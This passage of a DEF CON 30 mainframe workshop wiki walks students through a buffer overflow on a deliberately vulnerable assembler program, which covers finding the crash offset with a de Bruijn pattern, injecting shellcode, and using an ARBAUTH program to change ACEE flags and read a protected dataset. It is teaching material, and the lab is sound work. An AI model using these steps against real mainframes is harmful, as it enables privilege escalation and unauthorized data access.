*********************************************************************** 37 | MSGHI DC XL4'00570000' 38 | DC CL3'HI ' 39 | INAREA DS CL80 40 | SAVE DS 18F 41 | *********************************************************************** 42 | * DATASETS 43 | *********************************************************************** 44 | INDCB DCB DSORG=PS,MACRF=(GM),DDNAME=INPUTDD, X 45 | RECFM=FB,EODAD=SAYHI 46 | *********************************************************************** 47 | * MACROS 48 | *********************************************************************** 49 | YREGS 50 | END OPENTST CSECT 51 | ``` 52 | 53 | The overflow here is cause because the `INAREA` is only 80 bytes in size and the save area immediately follows. What happens if we pass it a dataset that is longer than 80 bytes? Its only possible because the INDCB macro call is being used insecurely. 54 | 55 | !! Run OPENTST 56 | 57 | By this point you should know how to edit and submit JCL. This lab only has one step: 58 | 59 | # Edit `.JCLLIB(LAB05)` replacing `` with your username, or really any text of your choice. 60 | 61 | If you look at the joblog you can see `+HI NEO... ` 62 | [img[neowhiterabbit.png]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 6 - De Brujin.tid: -------------------------------------------------------------------------------- 1 | created: 20220731220224535 2 | modified: 20220805071314556 3 | tags: 4 | title: Lab 6 - De Brujin 5 | type: text/vnd.tiddlywiki 6 | 7 | Using REXX generate a de Brujin pattern. This REXX script is courtesy of Davide Girardi and available here: https://gist.github.com/davidegirardi/61385ae404f4306349167ac1483b40b9#file-brujin-rex 8 | 9 | # Exit ISPF (hit `F3` until you're at the READY prompt or you can exit ISPF by putting `=x` on the command line) and run `RX DEBRUIJN 20`. This rexx script is stored in `.EXEC(DEBRUIJN)`. [img[debruijnrexx.png]] 10 | # Open up ISPF again and edit `.JCLLIB(LAB06)`. 11 | # Notice that all this JCL is doing is running the DEBRUIJN script and generating 1000 characters. 12 | # Submit this job to place those 1000 characters in `DC00.OVERFLOW.ARBAUTH(DEBRUIJN)` 13 | # The job should return with `MAX COND CODE 0000` 14 | 15 | [img[LAB6.png]] 16 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 7 - De Brujin Overflow.tid: -------------------------------------------------------------------------------- 1 | created: 20220731222605570 2 | modified: 20220805071536414 3 | tags: 4 | title: Lab 7 - De Brujin Overflow 5 | type: text/vnd.tiddlywiki 6 | 7 | OPENTST is vulnerable to a buffer overflow (we went over it in class). We have a file with 1,000 characters in a de Brujin pattern. Instead of sending Opentst our username, we send it that pattern. That's what the line `//INPUTDD DD DISP=SHR,DSN=DC00.OVERFLOW.ARBAUTH(DEBRUIJN)` in `.JCLLIB(LAB07)` doing. 8 | 9 | # Open and SUBMIT `.JCLLIB(LAB07)` 10 | # Notice the output from it is `ABENDED SYSTEM 0C6` ''BONUS'' Who can tell me what S0C6 means? 11 | # Its crashlog will be placed in `.DUMP003` edit that file 12 | # Search for `REGS AT TIME OF ERROR`: in ISPF `F "REGS AT TIME OF ERROR"` 13 | # Hit `F11` to scroll right, and notice that Register 14 (E) is set to `F8C183F9` (or similar) 14 | 15 | 16 | ``` 17 | 18 | +3C REGS AT TIME OF ERROR 84F1C184 F2C184F3 C184F4C1 84F5C184 F6C184F7 C184F8C1 84F9C184 F0C185F1 (0-7) 19 | +5C C185F2C1 85F3C185 F4C185F5 C185F6C1 85F7C185 00094FB0 F8C183F9 00000000 (8-F) 20 | +7C EC PSW AT TIME OF ERROR 078D0000 00C183FB 00020006 009B5800 21 | 22 | ``` 23 | 24 | # Edit `.OVERFLOW.ARBAUTH(DEBRUIJN)` and turn the hex editor on with `HEX ON`. 25 | # Search for `F8C183F9`: `F x'F8C183F9'` 26 | # The editor will find `8Ac9` but will put the cursor at the end. To fix this press `f10` and place your curson on the first 8 from the right hand side. Then press `F11`. It should look like this: 27 | [img[Screenshot_2022-07-31_17-01-06.png]] 28 | 29 | # Replace the hex `F8C183F9` with `DEADBEEF` or some other punny eye catcher HEX e.g. `ABADD00D` etc. and save your changes 30 | # Go back to `.JCLLIB(LAB07)` and resubmit it, you'll get the same error 31 | # Open `.DUMP003` and search for `DEADBEEF`. 32 | 33 | !! Find where we are in memory 34 | 35 | # The first 4 chars of the de Brujin pattern are `Aa1A` or `C1 81 F1 C1`. Open `.DUMP003` and search `F C181F1C1` then hit `F10` (the editor auto scrolled you to the right for the search). 36 | # Take note of the memory location `09DB40` 37 | # Edit `.OVERFLOW.ARBAUTH(DEBRUIJN)` again and replace `DEADBEEF` with `8009DB40` 38 | 39 | Should look like 40 | [img[Screenshot_2022-07-31_17-14-33.png]] 41 | 42 | # resubmit `.JCLLIB(LAB07)`, notice we get a different abnormal end: `ABENDED SYSTEM 0C1` -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 8 - Add our own Shell Code.tid: -------------------------------------------------------------------------------- 1 | created: 20220731235446888 2 | modified: 20220805150633882 3 | tags: 4 | title: Lab 8 - Add our own Shell Code 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Assemble and link WTOPOC 8 | 9 | # Open `.JCLLIB(LAB08)` and submit the job 10 | # If you look on line 41 this is where the binary will be placed e.g. `//LKED.SYSLMOD DD DSN=DC00.LOAD(WTOPOC)` means the assembled binary is in `DC00.LOAD(WTOPOC)` 11 | # Using FTP download WTOPOC to your machine: 12 | #* `ftp 2121` 13 | #* sign in with your username and password 14 | #* type `cd .LOAD`, 15 | #* type `bin` for binary download. 16 | #* type `get WTOPOC` to download our assembled binary 17 | # Using FTP also download `.OVERFLOW.ARBAUTH(DEBRUIJN)` 18 | #* `cd ..` to get out of `.LOAD` 19 | #* `cd .OVERFLOW.ARBAUTH` 20 | #* type `bin` 21 | #* Finally `get DEBRUIJN` 22 | # Open WTOPOC with Okteta (or your hex editor of choice): `okteta WTOPOC` 23 | #* ''Note'' You can read the text in the file by changing the encoding to "EBCDIC 1047" in the bottom right. 24 | # highlight the hex between the `CAFEBABE` and copy it with `ctrl-c` [img[hexhiighlight.png]] 25 | # Open the de Brujin file in Okteta: `okteta DEBRUIJN` or File -> Open, highlight the first byte and press `ctrl-v` [img[arbpoc.png]] 26 | # Save the changes to DEBRUIJN as a new file called `SHELCODE` ⚠️⚠️ ''NOTICE'' ⚠️⚠️ This file name is missing an L on purpose, we have an 8 character limit. 27 | # Using FTP, upload your changed DEBRUIJN file to `.OVERFLOW.ARBAUTH(SHELCODE)`: 28 | #* Login to FTP and cd to `.OVERFLOW.ARBAUTH` 29 | #* Change to binary more with `bin` 30 | #* upload the file with `put SHELCODE`. 31 | 32 | !! Submitting our exploit 33 | 34 | # Edit `.JCLLIB(LAB07)` and replace `DEBRUIJN` on line 12 with `SHELCODE` [img[shellcodejcl.png]] 35 | # SAVE your changes and SUBMIT the job, it will still abend with `C03` but thats okay. 36 | #* If it abends with anything else go back to the previous step and make sure you uploaded the files as ⚠️⚠️''binary''⚠️⚠️ 37 | 38 | !! Did it work?! 39 | 40 | # Open the joblog by typing `=3.8` in the command bar, and limit it to your userid with `st `. 41 | # Find the LAB07 output with the highest `JOB000##` number, and put an `S` in the S column in front of it. 42 | # Notice that our shell code was successfully executed as the joblog contains `+WTO HAS RUN! ` 43 | 44 | [img[Screenshot_2022-07-31_23-23-29.png]] 45 | 46 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 9 - Privesc with ARBAUTH.tid: -------------------------------------------------------------------------------- 1 | created: 20220801062422765 2 | modified: 20220805162959463 3 | tags: 4 | title: Lab 9 - Privesc with ARBAUTH 5 | type: text/vnd.tiddlywiki 6 | 7 | [img[Screenshot_2022-07-31_23-34-15.png]] 8 | 9 | If you've explored at all on the system you'll know there's a dataset called `WHITE.RABBIT`. Did you try to access it? What happens when you try to read `SCRIPT` in that dataset? If you try to ''E''dit or ''V''iew that dataset you will get access denied! Bummer! 10 | 11 | [img[denied.png]] 12 | 13 | Despite OPENTST being in a APF authorized library, it wasn't linked with `AC=1` which means it still can't run authorized! 14 | 15 | [img[opentstac0.png]] 16 | 17 | Luckily with have a program in `SYS2.LINKLIB` that can help us: ''ARBAUTH''. ARBAUTH lets us provide a program to run and it will run it as AC=1. 18 | 19 | !! Running ARBAUTH 20 | 21 | # Open lab 9: `.JCLLIB(LAB09)` and SUBMIT the job 22 | # You should get a max return code of `0000` 23 | 24 | !! Running Opentst with ARBAUTH 25 | 26 | # Open lab 10: `.JCLLIB(LAB10)` and SUBMIT the job 27 | # Whoa we get an even stranger CC `SYSTEM=53E`, don't worry we can ignore it 28 | # Look at the job log and see that our WTOR shell code ran just fine! 29 | 30 | [img[arbauthwto.png]] 31 | 32 | !! Prep for Privesc 33 | 34 | No we're going to use ARBAUTH and the overflow in OPENTST to change our permissions and follow the WHITE.RABBIT 35 | 36 | # Submit the job `.JCLLIB(LAB11)` this generates shell code to change a users ACEE Flag 1 to `10110001`. 37 | # Using FTP download the file `.LOAD(ACEEJOB)`. 38 | # Open the both DEBRUIJN and ACEEJOB with okteta: `okteta DEBRUIJN & okteta ACEEJOB` 39 | # Copy all bytes between `CAFEBABE` from ACEEJOB and paste them start at the first byte in `DEBRUIJN`. 40 | # Save this file as `PRIVESC` 41 | # Using FTP upload this file as ⚠️⚠️binary⚠️⚠️ to `.OVERFLOW.ARBAUTH(PRIVESC)` 42 | #* `cd .OVERFLOW.ARBAUTH` 43 | #* `bin` 44 | #* `PUT PRIVESC` 45 | 46 | !! Exploit 47 | 48 | # Open the file `.JCLLIB(LAB12)` in ISPF editor. 49 | #* Notice there's two steps, the ARBAUTH step `//ARBAUTH EXEC PGM=ARBAUTH, ` and the read step `//STEP01 EXEC PGM=IEBGENER,COND=EVEN`. 50 | #** Step 1: PRIVESC [img[privesc.png]] 51 | #** Step 2: Read the file we shouldn't [img[whiterabbit.png]] 52 | #* If you look at the JCL for `STEP01` you'll see `//SYSUT1 DD DSN=WHITE.RABBIT(SCRIPT),DISP=SHR`. 53 | #* This is the file that IEBGENER is going to read and output to the joblog. 54 | # Submit this job, it will also abend 55 | # Look at the job log, you should see `WRITING COMPLETE`. This means we successfully changed our ACEE! 56 | # Scroll down and notice you now have the contents of `WHITE.RABBIT(SCRIPT)` available to you! 57 | 58 | [img[Screenshot_2022-08-01_00-06-05.png]] 59 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-18.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-18.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220724193849044 2 | modified: 20220801071843956 3 | title: Screenshot_2022-07-24_12-32-18.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-44.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-44.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-44.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220724193835928 2 | modified: 20220801071844323 3 | title: Screenshot_2022-07-24_12-32-44.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-41-23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-41-23.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-41-23.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220724194138027 2 | modified: 20220801071844505 3 | title: Screenshot_2022-07-24_12-41-23.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-06-42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-06-42.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-06-42.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731180732190 2 | modified: 20220801071845233 3 | title: Screenshot_2022-07-31_11-06-42.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-32-55.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-32-55.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-32-55.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731183322789 2 | modified: 20220801071845268 3 | title: Screenshot_2022-07-31_11-32-55.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-40-25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-40-25.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-40-25.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731184049897 2 | modified: 20220801071845294 3 | title: Screenshot_2022-07-31_11-40-25.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-50-09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-50-09.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-50-09.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731185021868 2 | modified: 20220801071845331 3 | title: Screenshot_2022-07-31_11-50-09.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-00-00.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-00-00.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-00-00.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731190014322 2 | modified: 20220801071845358 3 | title: Screenshot_2022-07-31_12-00-00.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-05-20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-05-20.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-05-20.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731190532938 2 | modified: 20220801071845417 3 | title: Screenshot_2022-07-31_12-05-20.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_14-59-18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_14-59-18.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_14-59-18.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731215927735 2 | modified: 20220801071845452 3 | title: Screenshot_2022-07-31_14-59-18.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-01-47.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-01-47.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-01-47.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731220211970 2 | modified: 20220801071845527 3 | title: Screenshot_2022-07-31_15-01-47.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-25-34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-25-34.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-25-34.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731222544275 2 | modified: 20220801071845636 3 | title: Screenshot_2022-07-31_15-25-34.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-01-06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-01-06.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-01-06.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801000125535 2 | modified: 20220801071845759 3 | title: Screenshot_2022-07-31_17-01-06.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-14-33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-14-33.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-14-33.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801001458590 2 | modified: 20220801071845891 3 | title: Screenshot_2022-07-31_17-14-33.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-36-55.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-36-55.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-36-55.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801053344737 2 | modified: 20220801071845923 3 | title: Screenshot_2022-07-31_17-36-55.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-23-29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-23-29.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-23-29.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801062401019 2 | modified: 20220801071845956 3 | title: Screenshot_2022-07-31_23-23-29.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-34-15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-34-15.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-34-15.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801063425108 2 | modified: 20220801071845991 3 | title: Screenshot_2022-07-31_23-34-15.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_00-06-05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_00-06-05.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_00-06-05.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801070620408 2 | modified: 20220801071846020 3 | title: Screenshot_2022-08-01_00-06-05.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-21-12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-21-12.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-21-12.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801162155693 2 | modified: 20220801162155693 3 | title: Screenshot_2022-08-01_09-21-12.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-28-19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-28-19.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-28-19.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801162842229 2 | modified: 20220801162842229 3 | title: Screenshot_2022-08-01_09-28-19.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-56-25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-56-25.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-56-25.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801235710670 2 | modified: 20220801235710670 3 | title: Screenshot_2022-08-01_16-56-25.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-58-16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-58-16.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-58-16.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801235825095 2 | modified: 20220801235825095 3 | title: Screenshot_2022-08-01_16-58-16.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-13-16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-13-16.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-13-16.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802001330830 2 | modified: 20220802001330830 3 | title: Screenshot_2022-08-01_17-13-16.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-48-30.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-48-30.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-48-30.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802004840227 2 | modified: 20220802004840227 3 | title: Screenshot_2022-08-01_17-48-30.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-55-01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-55-01.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-55-01.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802005512140 2 | modified: 20220802005512140 3 | title: Screenshot_2022-08-01_17-55-01.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-56-51.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-56-51.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-56-51.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802005703770 2 | modified: 20220802005703770 3 | title: Screenshot_2022-08-01_17-56-51.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-03_16-17-06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-03_16-17-06.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-03_16-17-06.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220803231739573 2 | modified: 20220803231739573 3 | title: Screenshot_2022-08-03_16-17-06.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-04_15-46-24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-04_15-46-24.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-04_15-46-24.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220804224638326 2 | modified: 20220804224638326 3 | title: Screenshot_2022-08-04_15-46-24.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Welcome DEF CON 30!.tid: -------------------------------------------------------------------------------- 1 | created: 20220801070736633 2 | modified: 20220805060439649 3 | tags: 4 | title: Welcome DEF CON 30! 5 | type: text/vnd.tiddlywiki 6 | 7 | [img[title.jpg]] 8 | 9 | Welcome to the DEF CON 30 Mainframe buffer overflow workshop. Below are the labs for the class. Feel free to skip ahead but we won't help you if you get stuck. 10 | 11 | The labs below walk through a simple buffer overflow on a C program, a buffer overflow on an APF authorized program and using ARBAUTH to do privesc and a remote code execution overflow with EBCDIC to ASCII challenges. To do these labs you'll need at a minimum: 12 | 13 | * A tn3270 client. One is included with this course container at https://localhost:8443 or https://dc30.soldieroffortran.org:8443, the secret is `D3FC0N`. Other good options include x3270, c3270 or pw3270. 14 | * A hex editor, the class uses Okteta 15 | * A command line FTP client 16 | * Python 3 17 | * A web browser 18 | * A rexx script interpreter. Windows available here https://regina-rexx.sourceforge.io/ on Linux and MacOS you should be able to install this with your package manager of choice. e.g. `sudo apt install regina-rexx` 19 | * An open mind -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbauthwto.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/arbauthwto.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbauthwto.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805151712219 2 | modified: 20220805151712219 3 | title: arbauthwto.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbpoc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/arbpoc.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbpoc.png.meta: -------------------------------------------------------------------------------- 1 | created: 